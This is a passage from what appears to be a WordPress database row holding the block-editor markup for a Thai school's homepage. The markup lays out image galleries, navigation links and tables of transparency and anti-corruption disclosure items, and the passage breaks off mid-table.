(678,1,'2024-08-07 22:07:15','2024-08-07 15:07:15','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_1540af-66\",\"columns\":[1,1,1,1,1,1],\"thumbSize\":\"full\",\"ids\":[666,668],\"type\":\"carousel\",\"imageRatio\":\"land169\",\"autoPlay\":true,\"transSpeed\":1000,\"slidesScroll\":\"all\",\"arrowStyle\":\"none\",\"dotStyle\":\"light\",\"imagesDynamic\":[{\"id\":666,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=666\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"width\":1600,\"height\":900},{\"id\":668,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=668\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"width\":1600,\"height\":900}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=484\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=476\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=563\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"link\":\"http://pakhaeng.ssk.in.th/?page_id=469\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\" data-type=\"page\" data-id=\"650\">ข้อมูลพื้นฐาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=643\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_95f155-a6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_95f155-a6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=609\" data-type=\"page\" data-id=\"609\">ข้อมูลสิ่งก่อสร้าง</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=656\" data-type=\"page\" data-id=\"656\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=605\" data-type=\"page\" data-id=\"605\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=496\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=496\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e5e0c341\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":503,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Is-It-a-Gift-Instagram-Post.png\" alt=\"\" class=\"wp-image-503\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"9l7bo6vn\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showTaxonomy\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"showPagination\":true,\"postsPerPage\":\"2\",\"headingText\":\"วิดีโอกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"headingHide\":false,\"category-terms\":[{\"label\":\"วิดีโอกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%a7%e0%b8%b4%e0%b8%94%e0%b8%b5%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#ff6900\"} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=546\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?post_type=popupbuilder&amp;p=328\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=542\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\" data-type=\"page\" data-id=\"355\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=506\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=337\">Q&amp;A</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=566\" data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong>รายงานผลการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" 